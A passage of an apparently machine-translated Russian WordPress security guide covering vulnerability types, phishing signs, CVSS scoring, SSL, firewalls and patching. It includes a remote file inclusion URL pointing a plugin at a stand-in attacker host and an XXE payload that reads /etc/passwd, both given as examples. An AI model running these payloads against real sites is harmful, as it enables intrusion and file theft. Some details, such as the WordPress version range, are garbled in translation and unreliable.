 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Предотвращение удаленного включения файлов

Создайте разрешенный список файлов, которые может включать страница, а затем используйте идентификатор для доступа к выбранному файлу. А затем заблокируйте любой запрос, содержащий недопустимый идентификатор.

17. Уязвимость при обходе каталогов

Уязвимость, связанная с обходом каталогов или файлов, позволяет злоумышленнику читать произвольные файлы на сервере, на котором выполняется приложение.

Пример обхода каталогов

Версии WordPress 5.7 - 5.03 были уязвимы для атак с обходом каталогов, поскольку они не могли должным образом проверять данные, вводимые пользователем. Злоумышленник, имеющий доступ к учетной записи с правами как минимум author может воспользоваться уязвимостью обхода каталога и выполнить вредоносный PHP-код на базовом сервере, что приведет к полному удаленному захвату.

Как предотвратить обход каталога

Разработчики могут использовать индексы, а не фактические части имен файлов при создании шаблонов или использовании языковых файлов.

18. Уязвимость, связанная со злонамеренным перенаправлением.

Уязвимость Malicious Redirect позволяет злоумышленнику внедрить код для перенаправления посетителей сайта на другой сайт.

Пример вредоносного перенаправления

Допустим, вы ищете синий свитер с помощью инструмента поиска в онлайн-бутике.

К сожалению, сервер бутика не может правильно кодировать вводимые пользователем данные, и злоумышленник смог внедрить вредоносный скрипт перенаправления в ваш поисковый запрос.

Итак, когда вы вводите синий свитер в поле поиска бутика и нажимаете клавишу ВВОД, вы попадаете на веб-страницу злоумышленника, а не на страницу бутика со свитерами, соответствующими описанию вашего поиска.

Как предотвратить вредоносное перенаправление

Вы можете защититься от злонамеренных перенаправлений, очищая вводимые пользователем данные, проверяя URL-адреса и получая подтверждения посетителей для всех перенаправлений за пределы сайта.

19. Уязвимость внешнего объекта XML

Уязвимость внешней сущности XXE или XML позволяет злоумышленнику обманом заставить анализатор XML передать конфиденциальную информацию внешнему объекту, находящемуся под их контролем.

Пример внешней сущности XML

Злоумышленник может использовать уязвимость XXE, чтобы получить доступ к конфиденциальным файлам, таким как etc / passwd, в котором хранится информация об учетной записи пользователя.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

Как предотвратить использование внешнего объекта XML

Лучший способ предотвратить появление XXE - использовать менее сложные форматы данных, такие как JSON, и избегать сериализации конфиденциальных данных.

20. Атака отказа в обслуживании

DoS -атака или атака типа «отказ в обслуживании» - это преднамеренная попытка сделать ваш веб-сайт или приложение недоступным для пользователей путем наводнения его сетевым трафиком.

В DDoS- атаке распределенного отказа в обслуживании злоумышленник использует несколько источников для наводнения сети трафиком. Злоумышленник захватит группы зараженных вредоносным ПО компьютеров, маршрутизаторов и устройств Интернета вещей, чтобы увеличить поток трафика.

Пример атаки отказа в обслуживании

Самая крупная в истории DDoS-атака (распределенный отказ в обслуживании) была проведена против AWS в феврале этого года. Amazon сообщила, что AWS Shield, их управляемая служба защиты от угроз, наблюдала и смягчала эту масштабную DDoS-атаку. Атака длилась 3 дня и достигла пиковой скорости 2,3 Терабайта в секунду.

Как предотвратить атаку отказа в обслуживании

Есть 2 основных способа смягчить DoS-атаку.

1. Купите больше хостинга, чем вам нужно. Наличие дополнительных ресурсов в вашем распоряжении может помочь вам выдержать повышенный спрос, вызванный DoS-атакой.
2. Используйте брандмауэр на уровне сервера, например Cloudflare. Брандмауэр может обнаружить необычный всплеск трафика и предотвратить перегрузку вашего сайта.

21. Регистрация нажатия клавиш

Ведение журнала нажатия клавиш , также известное как кейлоггинг или захват клавиатуры, происходит, когда хакер скрытно отслеживает и записывает нажатия клавиш посетителей веб-сайта.

Пример регистрации нажатия клавиш

В 2017 году хакер успешно установил вредоносный JavaScript на сервер производителя смартфонов OnePlus.

Используя вредоносный код, злоумышленники отслеживали и регистрировали нажатия клавиш клиентов OnePlus, когда они вводили данные своей кредитной карты. Хакеры регистрировали и собирали нажатия клавиш 40 000 клиентов, прежде чем OnePlus обнаружил и исправил взлом.

Как предотвратить ведение журнала нажатий клавиш

Обновите все! Как правило, злоумышленнику необходимо использовать другую существующую уязвимость, чтобы внедрить кейлоггер на компьютер или сервер. Постоянное обновление всего с помощью последних исправлений безопасности не даст хакерам простой способ установить кейлоггер на ваш веб-сайт или компьютер.

Бонус: фишинг

Уязвимости программного обеспечения - единственное, чем пытаются воспользоваться хакеры и киберпреступники. Хакеры также нацелены на людей и эксплуатируют их. Одним из распространенных методов эксплуатации является фишинг.

Что такое фишинг?

Фишинг - это метод кибератаки с использованием электронной почты, социальных сетей, текстовых сообщений и телефонных звонков, чтобы обманом заставить жертву предоставить личную информацию. Затем злоумышленник будет использовать эту информацию для доступа к личным учетным записям или для совершения мошенничества с идентификацией.

Как обнаружить фишинговое письмо

Как мы узнали ранее в этом посте, для использования некоторых уязвимостей требуется определенное взаимодействие с пользователем. Один из способов, которым хакер обманом заставляет людей участвовать в их гнусных начинаниях, - это рассылать фишинговые электронные письма.

Узнав, как распознать фишинговое письмо, вы не сможете случайно сыграть в планы киберпреступников.

4 совета по обнаружению фишинговых писем :

1. Посмотрите на адрес электронной почты отправителя. Если вы получаете электронное письмо от компании, часть адреса электронной почты отправителя после символа «@» должна совпадать с названием компании.
   
   Если электронное письмо представляет компанию или государственный орган, но использует общедоступный адрес электронной почты, например «@gmail», это признак фишингового письма.
   
   Следите за незначительными ошибками в написании доменного имени. Например, давайте посмотрим на этот адрес электронной почты [электронная почта защищена]. Мы видим, что у Netflix в конце стоит дополнительный символ «x». Опечатка является явным признаком того, что письмо было отправлено мошенником, и его следует немедленно удалить.
   
2. Ищите грамматические ошибки . Письмо с грамматическими ошибками является признаком злонамеренного письма. Все слова могут быть написаны правильно, но в предложениях отсутствуют слова, которые сделали бы предложение связным. Например: «Ваш аккаунт взломан. Обновите пароль для безопасности учетной записи ».
   
   Все делают ошибки, и не каждое электронное письмо с одной или двумя опечатками - это попытка вас обмануть. Однако многочисленные грамматические ошибки требуют более внимательного изучения, прежде чем отвечать.
   
3. Подозрительные вложения или ссылки - стоит на мгновение приостановить работу с любыми вложениями или ссылками, включенными в электронное письмо.
   
   Если вы не узнаете отправителя электронного письма, вам не следует загружать вложения, включенные в электронное письмо, поскольку оно может содержать вредоносное ПО и заразить ваш компьютер. Если в электронном письме утверждается, что оно принадлежит компании, вы можете погуглить их контактную информацию, чтобы убедиться, что письмо было отправлено от них, прежде чем открывать какие-либо вложения.
   
   Если электронное письмо содержит ссылку, вы можете навести указатель мыши на ссылку, чтобы убедиться, что URL-адрес отправляет вам туда, где он должен быть.
   
4. Следите за срочными запросами - мошенники часто используют уловку, чтобы создать ощущение срочности. Вредоносное электронное письмо может создать сценарий, требующий немедленных действий. Чем больше у вас будет времени подумать, тем больше шансов, что вы определите, что запрос исходит от мошенника.
   
   Вы можете получить электронное письмо от своего «босса» с просьбой заплатить поставщику как можно скорее или от вашего банка, информирующее вас о том, что ваша учетная запись была взломана и требуются немедленные действия.

Как измерить серьезность уязвимости WordPress

Есть несколько типов уязвимостей WordPress, все с разной степенью риска. К счастью для нас, Национальная база данных уязвимостей - проект Национального института науки и технологий - имеет калькулятор системы оценки уязвимостей для определения риска уязвимости.

В этом разделе руководства по уязвимостям WordPress будут рассмотрены показатели и уровни серьезности системы оценки уязвимостей. Хотя этот раздел носит более технический характер, некоторые пользователи могут счесть его полезным для более глубокого понимания того, как оцениваются уязвимости WordPress и их серьезность.

Общие показатели системы оценки уязвимостей WordPress

Уравнение системы оценки уязвимости использует три различных набора оценок для определения общей оценки серьезности.

1. Базовые показатели

Группа показателей «Базовая» представляет характеристики уязвимости, которые постоянны во всех пользовательских средах.

Базовые показатели делятся на две группы: возможность использования и влияние.

1.1. Метрики использования

Оценка уязвимости зависит от того, насколько сложно злоумышленнику воспользоваться уязвимостью. Оценка рассчитывается с использованием 5 различных переменных.

1.1.1. Вектор атаки (AV)

Оценка вектора атаки основана на методе использования уязвимости. Оценка будет тем выше, чем дальше злоумышленник сможет воспользоваться уязвимостью.

Идея состоит в том, что количество потенциальных злоумышленников будет намного больше, если уязвимость может быть использована через сеть по сравнению с уязвимостью, которая требует физического доступа к эксплойту устройства.

Чем больше потенциальных злоумышленников, тем выше риск эксплуатации, и, следовательно, оценка вектора атаки, присвоенная уязвимости, будет выше.

1.1.2. Сложность атаки (AC)

Значение сложности зависит от условий, необходимых для использования уязвимости. При некоторых условиях может потребоваться сбор дополнительной информации о цели, наличии определенных параметров конфигурации системы или вычислительных исключениях.

Оценка сложности атаки будет тем выше, чем ниже сложность, необходимая для использования уязвимости.

1.1.3. Требуемые привилегии (PR)

Оценка требуемых привилегий рассчитывается на основе привилегий, которые злоумышленник должен получить перед использованием уязвимости. Мы еще немного рассмотрим это в разделе «Прошедшие проверку или не прошедшие проверку подлинности».

Если никаких привилегий не требуется, оценка будет самой высокой.

1.1.4. Взаимодействие с пользователем (UI)

Оценка взаимодействия с пользователем определяется в зависимости от того, требует ли уязвимость взаимодействия с пользователем для использования.

Оценка будет наивысшей, если злоумышленнику не требуется взаимодействия с пользователем для использования уязвимости.

1.1.5. Сфера

Оценка области действия основана на уязвимости в одном программном компоненте, которая может повлиять на ресурсы, выходящие за пределы области безопасности.

Область безопасности включает в себя другие компоненты, которые обеспечивают функциональность только этому компоненту, даже если эти другие компоненты имеют свои собственные полномочия безопасности.

Оценка является самой высокой, когда происходит изменение объема.

1.2. Показатели воздействия

Метрики воздействия отражают прямые последствия успешно использованной уязвимости.

1.2.1. Конфиденциальное воздействие (C)

Эта конфиденциальная оценка воздействия измеряет влияние на конфиденциальность информации, которой управляет эксплуатируемое программное обеспечение.

Оценка наивысшая, когда пораженное программное обеспечение несет наибольшие убытки.

1.2.2. Целостность (I)

Эта оценка целостности основана на влиянии на целостность успешно использованной уязвимости.

Наивысшая оценка достигается, когда последствия воздействия уязвимого программного обеспечения наиболее велики.

1.2.3. Доступность (A)

Оценка доступности основана на влиянии доступности используемого программного обеспечения.

Оценка является самой высокой, когда последствия затронутого компонента наиболее велики.

Расчет базового балла по шкале CVSS

Базовый балл является функцией уравнений промежуточного балла «Воздействие» и «Возможность использования». Если Базовая оценка определяется как,

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Показатели временной оценки

Временные метрики измеряют текущее состояние методов эксплойтов, наличие каких-либо исправлений или обходных путей или степень уверенности в описании уязвимости.

Ожидается, что временные метрики будут меняться со временем.

2.1. Зрелость кода эксплойта (клавиша E)

Зрелость кода эксплойта зависит от вероятности атаки на уязвимость.

Чем проще можно использовать уязвимость, тем выше оценка уязвимости.

2.2. Уровень исправления (RL)

Уровень исправления уязвимости является важным фактором при расстановке приоритетов. Обходные пути или исправления могут предлагать временное исправление, пока не будет выпущено официальное исправление или обновление.

Чем менее официальное и постоянное исправление, тем выше оценка уязвимости.

2.3. Доверие к отчету (RC)

Показатель достоверности отчета измеряет уровень уверенности в существовании уязвимости и достоверность технических деталей.

Чем больше уязвимость подтверждается поставщиком или другими авторитетными источниками, тем выше оценка.

Расчет временного балла по шкале CVSS

Временная оценка определяется как,

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Показатели экологической оценки

Метрики среды позволяют аналитикам настраивать оценку CVSS в зависимости от важности затронутых ИТ-активов.

Метрики «Эксплуатация окружающей среды» и «Воздействие» являются модифицированным эквивалентом базовой метрики, и им присваиваются значения в зависимости от размещения компонентов инфраструктуры организации. См. Приведенные выше разделы «Базовые показатели», чтобы просмотреть значения и описания показателей «Возможность использования» и «Воздействие».

Метрики окружающей среды содержат дополнительную группу Модификаторы оценки воздействия.

3.1. Показатели модификаторов оценки воздействия

Метрики Impact Subscore Modifiers оценивают конкретные требования безопасности для конфиденциальности (CR), целостности (IR) и доступности (AR), позволяя точно настроить оценку среды в соответствии с пользовательской средой.

Расчет экологической оценки CVSS

Оценка состояния окружающей среды определяется как:

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

Общий балл по CVSS и серьезность

Система оценки общей общей уязвимости или оценка CVSS представляет собой базовую, временную и экологическую оценки.

Общая оценка CVSS может использоваться, чтобы дать вам представление о том, насколько серьезна или серьезна уязвимость.

Пример оценки серьезности CVSS в реальном мире

В нашем обзоре уязвимостей за декабрь 2020 года мы сообщили об уязвимости в подключаемом модуле Easy WP SMTP. Уязвимость «нулевого дня» (мы рассмотрим уязвимости нулевого дня в следующем разделе) позволила злоумышленнику получить контроль над учетной записью администратора и использовалась в «дикой природе».

Взглянув на запись в Национальной базе данных уязвимостей, мы можем найти рейтинг серьезности уязвимости WP SMTP.

Давайте разберем пару вещей из приведенного выше снимка экрана WP SMTP NVDB.

Базовая оценка : базовая оценка составляет 7,5, что говорит о высоком уровне серьезности уязвимости.

Вектор : вектор говорит нам, что оценка основана на уравнениях уязвимости CVSS 3.1 и метриках, используемых для расчета оценки.

Вот метрическая часть вектора.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Теперь давайте воспользуемся значениями и описаниями базовой метрики, приведенными ранее в этом посте, чтобы понять восемь значений метрики вектора.

1. AV: N - это означает, что вектор атаки (AV) уязвимости - это Сеть (N). Другими словами, злоумышленнику нужен только доступ к сети, чтобы воспользоваться уязвимостью.
2. AC: L - Сложность атаки (AC) уязвимости низкая (L). Другими словами, любой ребенок-скрипач может воспользоваться уязвимостью.
3. PR: N - Требуемые привилегии (PR), необходимые для использования уязвимости, равны None (N). Таким образом, уязвимость не требует для использования аутентифицированного пользователя. (Мы рассмотрим разницу между уязвимостями с проверкой подлинности и без проверки подлинности позже в этом посте.)
4. UI: N - Взаимодействие с пользователем (UI), необходимое для использования этой уязвимости, - None (N). Таким образом, у злоумышленника есть возможность самостоятельно использовать уязвимость.
5. S: U - это означает, что область действия (S) уязвимости не изменилась (U). В случае этой уязвимости уязвимый компонент и затронутый компонент одинаковы.
6. C: H - Влияние уязвимости на конфиденциальность (C) высокое (H). Когда эта уязвимость используется, это приводит к полной потере конфиденциальности.
7. I: N - Влияние этой уязвимости на целостность (I) равно «Нет» (N). Когда уязвимость используется, не происходит потери целостности или надежности уязвимой информации.
8. A: N - это означает, что влияние доступности (A) равно None (N). Эксплуатация уязвимости никак не повлияет на доступность вашего веб-сайта.

Оценка CVSS может помочь нам определить серьезность и масштаб любой уязвимости. В следующих парах разделов мы рассмотрим некоторые важные термины уязвимостей, которые часто включаются в сообщения об уязвимостях.

Заключение

В этом разделе мы узнали несколько важных элементов безопасности WordPress, в том числе мотивы хакеров, различные типы взломов, уязвимости, которые используют онлайн-преступники, как снизить риск уязвимостей и как определить риск, который уязвимость представляет для вашего компьютера. Веб-сайт.

Понимание того, как злоумышленники пытаются взломать наши веб-сайты и их цели после взлома наших веб-сайтов, позволяет нам создать надлежащую защиту.

В следующих разделах вы узнаете, как защитить свой сайт практически от всех видов атак, которые хакер может на вас нанести.

Раздел 4: Защита вашего сервера

Первым шагом в вашей стратегии безопасности WordPress является защита вашего сервера. На вашем сервере хранятся все файлы и код, обеспечивающие работу вашего сайта.

В этом разделе вы узнаете:

1. Важность выбора хорошего хозяина.
2. Как зашифровать сообщения на вашем сайте.
3. Как брандмауэр может помочь защитить ваш сайт.

Выберите подходящий хостинг

Не все веб-хосты созданы равными, и выбор одного исключительно по цене может в конечном итоге обойтись вам дороже из-за проблем с безопасностью WordPress. Большинство сред виртуального хостинга безопасны, но в некоторых учетные записи пользователей не разделяются должным образом.

Ваш хост должен быть бдительным в отношении применения последних исправлений безопасности и соблюдения других важных рекомендаций по безопасности хостинга WordPress, связанных с безопасностью серверов и файлов. Ваш хост должен проявлять бдительность в отношении применения последних исправлений безопасности и соблюдения других важных рекомендаций по обеспечению безопасности хостинга, связанных с безопасностью серверов и файлов.

Зашифруйте свой сайт WordPress с помощью SSL

Secure Sockets Layer, также известный как SSL, - это технология безопасности, которая обеспечивает шифрование между клиентом и веб-сервером. Чтобы понять это немного проще, «клиент» - это веб-браузер, такой как Chrome или Safari, а «веб-сервер» - это ваш веб-сайт или интернет-магазин.

Простой способ узнать, установлен ли на посещаемом вами веб-сайте сертификат SSL, - это посмотреть в адресной строке браузера, чтобы узнать, начинается ли URL-адрес с HTTP или HTTPS. Если URL-адрес начинается с HTTPS, вы безопасно просматриваете сайт с использованием SSL.

Почему так важен SSL?

Отсутствие SSL-сертификата в 2021 году - дорогое удовольствие. Почему? Если у вас не включен SSL на вашем веб-сайте, потенциальным клиентам будет сложнее узнать о вашем существовании, а те, кто найдет ваш сайт, могут бояться давать вам деньги.

Каждый раз, когда мы совершаем онлайн-покупку, между вашим браузером и интернет-магазином происходит обмен данными. Например, когда мы вводим номер нашей кредитной карты в наш браузер, наш браузер передает этот номер интернет-магазину. После того, как магазин получает платеж, он сообщает вашему браузеру, что ваша покупка была успешной.

При обмене информацией между нашим браузером и сервером магазина следует иметь в виду, что эта информация делает несколько остановок в пути. SSL обеспечивает шифрование связи, чтобы гарантировать, что наша кредитная карта не будет видна до тех пор, пока она не достигнет конечного пункта назначения на сервере магазина.

Чтобы лучше понять, как работает шифрование, подумайте о том, как доставляются наши покупки. Если вы когда-либо отслеживали статус доставки онлайн-покупки, вы бы увидели, что ваш заказ сделал несколько остановок, прежде чем прибыл к вам домой. Если продавец неправильно упаковал вашу покупку, людям было бы легко увидеть, что вы купили.

SSL - важный инструмент в предотвращении перехвата злоумышленниками конфиденциальной информации, такой как пароли и номера кредитных карт, которые используются совместно клиентом и веб-сервером.

Почему сертификат SSL необходим для каждого веб-сайта?

Преимущества безопасности WordPress, которые вы получаете от наличия сертификата SSL на своем веб-сайте, достаточны, чтобы сделать его обязательным для любого веб-сайта. Однако, чтобы побудить всех защищать посетителей своих сайтов, веб-браузеры и поисковые системы создали отрицательные стимулы, чтобы побудить всех использовать SSL. В этом разделе мы расскажем о дорогостоящих последствиях отключения SSL на вашем веб-сайте.

1. Отключение SSL повредит вашему SEO-рейтингу

Поисковая оптимизация или SEO - это процесс оптимизации вашего веб-сайта, чтобы его можно было обнаружить на страницах результатов поисковых систем. Преимущество SEO в том, что это отличный способ увеличить органический и неоплачиваемый трафик на ваш сайт. Если вы продаете курс по выпечке хлеба, вы хотите, чтобы ваш веб-сайт отображался на первой странице результатов поиска в Google, или Duck Duck Go, посвященный курсу по выпечке хлеба.

Без включения SSL на вашем сайте поисковые системы будут наказывать вас и понижать ваш рейтинг. Один из показателей, который Google использует для ранжирования веб-сайтов в результатах поиска, - это надежность. В интересах Google не отправлять своих пользователей на небезопасные веб-сайты, поэтому надежность имеет большое значение в их алгоритме ранжирования. Благодаря тому, что SSL обеспечивает такую ​​большую безопасность, это важная часть того, как Google оценивает надежность веб-сайта.

2. Браузеры помечают сайты без SSL как небезопасные

Еще один способ, которым отключение SSL будет стоить вам, - это то, что браузер вашего посетителя предупредит его о том, что ваш сайт небезопасен. Как мы упоминали ранее, после установки SSL-сертификата на свой веб-сайт URL-адрес вашего сайта изменится с http : //yourwebsite.com на https: // yourwebsite / com. Chrome, например, будет отмечать зашифрованные HTTPS веб-страницы как безопасные с заблокированным замком. В качестве альтернативы Chrome заменит заблокированный замок для всех веб-страниц без HTTP-шифрования текстом Not Secure .

Я не буду делать покупки на веб-сайтах, отмеченных моим браузером как небезопасные, и я не единственный, кто этого не сделает. Согласно исследованию GlobalSign, 85% онлайн-покупателей избегают незащищенных веб-сайтов. Имейте в виду, что в 2021 году жизненно важно, чтобы все ваши сайты использовали HTTPS, а не только страницы входа и оплаты. Потенциальный покупатель может не попасть в безопасную кассу, если страницы магазина помечены их веб-браузером как небезопасные.

3. Вы можете потерять потенциальных клиентов.

Защита ваших клиентов - важная причина для включения SSL на вашем веб-сайте. Если они готовы доверить вам свой бизнес, самое меньшее, что вы можете сделать, - это вознаградить это доверие, защитив их с помощью шифрования.

Если хакер может украсть данные кредитной карты вашего клиента из-за отсутствия шифрования на вашем веб-сайте, вы не только потеряете их доверие, но и потеряете все их бизнесы в будущем.

Как я могу узнать, включен ли на моем веб-сайте SSL?

Простой способ узнать, установлен ли на вашем веб-сайте сертификат SSL, - это посмотреть в адресной строке браузера, чтобы узнать, начинается ли URL с HTTP или HTTPS. Если URL-адрес начинается с HTTPS, ваш веб-сайт защищен с помощью SSL.

Вы также можете использовать средство проверки SSL, например SSL Labs. Программа проверки SSL просканирует ваш сайт на предмет наличия сертификата SSL и сообщит вам, когда истечет срок действия вашего SSL-сертификата.

Как я могу установить сертификат SSL на свой веб-сайт WordPress?

Если на вашем веб-сайте WordPress отсутствует SSL, первое, что вам следует сделать, это попросить вашего хостинг-провайдера узнать, предоставляют ли они бесплатный сертификат и конфигурацию SSL. В 2021 году большинство хостинговых компаний включат SSL в свои хостинговые пакеты. Например, iThemes Hosting предоставляет и управляет SSL для каждого веб-сайта.

Если ваш хост не предоставляет вам бесплатный сертификат SSL, не волнуйтесь, есть еще много других вариантов.

Cloudflare предлагает бесплатный общий SSL-сертификат для веб-сайтов WordPress. Если вы предпочитаете не иметь общий сертификат SSL и вам удобна командная строка, CertBot - отличный вариант. Certbot не только создает для вас бесплатный SSL-сертификат с помощью Let's Encrypt, но также автоматически управляет продлением сертификата за вас.

В 2021 году необходимо включить SSL на вашем веб-сайте WordPress. SSL защищает связь между вами и вашими клиентами, улучшает ваше SEO и дает посетителям вашего сайта комфорт, который они в безопасности при просмотре вашего сайта.

Используйте брандмауэр веб-приложения

Использование брандмауэра веб-приложения - отличный способ добавить еще один уровень защиты на ваш сайт WordPress.

Что такое брандмауэр веб-приложений?

WAF или брандмауэр веб-приложений помогает защитить ваш сайт, отслеживая интернет-трафик, направляемый на ваш сайт, до того, как он попадет на ваш сайт.

Добавляя WAF перед WordPress, вы добавляете контрольную точку безопасности между Интернетом и вашим сайтом. Прежде чем трафик сможет получить доступ к вашему сайту, он должен пройти через WAF.

Если WAF обнаруживает какой-либо вредоносный трафик, такой как CSRF, XSS, SQL-инъекции и т. Д., Он отфильтрует его до того, как попадет на ваш веб-сайт. Более того, WAF может помочь обнаружить DDoS-атаку и реализовать ограничение скорости, чтобы предотвратить сбой вашего веб-сайта.

3 способа реализации WAF

Есть 3 разных способа реализовать WAF. Давайте посмотрим на плюсы и минусы каждого типа.

1. Сетевой WAF - сетевой или физический WAF аппаратно. Основным преимуществом сетевого WAF является низкая задержка, связанная с локальной установкой. Однако недостаток заключается в цене на хранение и обслуживание физического оборудования. Цена и требования к физическому хранилищу делают это плохим выбором для большинства людей.
2. WAF на основе хоста - WAF на основе хоста или локальный WAF интегрируется в WordPress, обычно с использованием плагина. Плюс хоста WAF в том, что он дешевле, чем сетевой WAF. Минус локального WAF - это требования к ресурсам вашего сервера. А из-за фильтрации трафика на вашем веб-сайте это может привести к более медленной загрузке страницы для посетителей вашего веб-сайта.
3. Облачный WAF - Облачный WAF обычно является лучшим вариантом для большинства людей. Плюс облачных WAF в том, что они доступны по цене и не требуют от вас управления. Кроме того, благодаря фильтрации трафика до того, как он попадет на ваш сайт, он не будет поглощать ресурсы вашего сервера и замедлять работу вашего сайта. Cloudflare и Sucuri - популярные провайдеры облачных межсетевых экранов.

Заключение

В этом разделе мы узнали, почему так важно выбрать правильный хост, как защитить связь между нашим веб-сайтом и его посетителями и как WAF может помочь заблокировать попадание вредоносного трафика на наш веб-сайт.

В следующем разделе вы узнаете о лучших методах обеспечения безопасности вашего программного обеспечения WordPress.

Раздел 5: Безопасность программного обеспечения WordPress

Каждый раз, когда вы устанавливаете новый плагин или тему, вы вводите новый код, который может быть использован хакерами. В этом разделе вы узнаете, что можно и чего нельзя делать при управлении WordPress, плагинами и темами.

1. Устанавливайте программное обеспечение только из надежных источников

Устанавливайте плагины и темы WordPress только из надежных источников. Вам следует устанавливать только программное обеспечение, которое вы получаете с WordPress.org, из известных коммерческих репозиториев или напрямую от известных разработчиков. Вам следует избегать использования «обнуленных» версий коммерческих подключаемых модулей, поскольку они могут содержать вредоносный код. Неважно, как вы заблокируете свой сайт WordPress, если вы устанавливаете вредоносное ПО.

Если плагин или тема WordPress не распространяется на веб-сайте разработчика, вам следует проявить должную осмотрительность перед загрузкой плагина. Обратитесь к разработчикам, чтобы узнать, связаны ли они каким-либо образом с веб-сайтом, который предлагает их продукт по бесплатной или сниженной цене.

2. Удалите неиспользуемые подключаемые модули и темы.

Наличие на вашем сайте неиспользуемых или неактивных плагинов и тем - серьезная ошибка безопасности WordPress. Каждый фрагмент кода на вашем веб-сайте - потенциальная точка входа для хакера.

Разработчики часто используют сторонний код, например JS-библиотеки, в своих плагинах и темах. К сожалению, если библиотеки не обслуживаются должным образом, они могут создавать уязвимости, которые злоумышленники могут использовать для взлома вашего веб-сайта.

Примечание. Используйте аудит сайта iThemes Sync Pro, чтобы проверить свои веб-страницы на наличие интерфейсных библиотек JavaScript с известными уязвимостями безопасности.

Удалите и полностью удалите все ненужные плагины и темы со своего сайта WordPress, чтобы ограничить количество точек доступа и исполняемого кода на вашем сайте.

3. Своевременно обновляйте программное обеспечение WordPress.

Постоянное обновление программного обеспечения - важная часть любой стратегии безопасности WordPress. Обновления предназначены не только для исправления ошибок и новых функций. Обновления также могут включать критические исправления безопасности. Без этого патча вы оставляете свой телефон, компьютер, сервер, маршрутизатор или веб-сайт уязвимыми для атак.

Наличие уязвимого плагина или темы, для которой есть исправление, но не применено, является виновником номер один взломанных веб-сайтов WordPress. Это означает, что большинство уязвимостей используется ПОСЛЕ выпуска исправления для уязвимости.

Широко известное нарушение Equifax можно было бы предотвратить, если бы они обновили свое программное обеспечение. Взлому Equifax просто не было оправдания.

Вас может защитить такая простая вещь, как обновление программного обеспечения. Так что не игнорируйте эти обновления WordPress - обновления являются одним из самых основных компонентов безопасности WordPress и всей веб-безопасности.

Патч вторник

Вторник исправлений - это неофициальный термин, обозначающий регулярные исправления ошибок и исправления безопасности, которые Microsoft выпускает во второй вторник каждого месяца. Замечательно, что Microsoft выпускает исправления безопасности с такой надежной частотой. Вторник исправлений также является днем ​​публичного раскрытия уязвимостей системы безопасности, исправленных Microsoft.

Ознакомьтесь с разделом Что обновлять и как автоматизировать обновления электронной книги The Ultimate Guide to WordPress Security in 2020, чтобы узнать, как автоматически применять обновления Patch Tuesday.

Использовать среду

В среду после вторника исправлений часто можно увидеть, как многие злоумышленники используют ранее известную уязвимость в устаревших и не исправленных системах. Итак, среда, следующая за вторником патчей, неофициально была названа Exploit Environment.

Почему хакеры нацелены на исправленные уязвимости?

Хакеры нацелены на исправленные уязвимости, потому что знают, что люди не обновляются (включая плагины и темы на вашем сайте). Публичное раскрытие уязвимостей в день их исправления является отраслевым стандартом. После публичного раскрытия уязвимости она становится «известной уязвимостью» для устаревших и непропатченных версий программного обеспечения. Программное обеспечение с известными уязвимостями - легкая цель для хакеров.

Хакерам нравятся легкие цели, а наличие программного обеспечения с известными уязвимостями похоже на передачу хакеру пошаговых инструкций по взлому вашего веб-сайта WordPress, сервера, компьютера или любого другого устройства, подключенного к Интернету.

Ответственное раскрытие информации

Вам может быть интересно, почему уязвимость раскрывается, если она дает хакерам возможность атаковать. Что ж, очень часто исследователь безопасности находит уязвимость и в частном порядке сообщает о ней разработчику программного обеспечения.

При ответственном раскрытии информации первоначальный отчет исследователя направляется в частном порядке разработчикам компании, владеющей программным обеспечением, но с соглашением о том, что полная информация будет опубликована после того, как исправление станет доступным. Для значительных уязвимостей безопасности может быть небольшая задержка в раскрытии уязвимости, чтобы дать большему количеству людей время для исправления.

Исследователь безопасности может указать крайний срок для разработчика программного обеспечения, чтобы ответить на отчет или предоставить исправление. Если этот срок не соблюден, исследователь может публично раскрыть уязвимость, чтобы заставить разработчика выпустить исправление.

Публичное раскрытие уязвимости и кажущееся введение «нулевого дня» - типа уязвимости, для которой нет исправления и которая эксплуатируется в дикой природе - может показаться контрпродуктивным. Но это единственное средство, с помощью которого исследователь может оказать давление на разработчика, чтобы исправить уязвимость.

Если бы хакер обнаружил уязвимость, он мог бы незаметно использовать эксплойт и нанести ущерб конечному пользователю (это вы), в то время как разработчик программного обеспечения остается довольным, оставив уязвимость не исправленной.

У Google Project Zero есть аналогичные рекомендации, когда дело доходит до раскрытия уязвимостей. Они публикуют полную информацию об уязвимости через 90 дней, независимо от того, была ли уязвимость исправлена.

Учимся обновлять: трудный путь

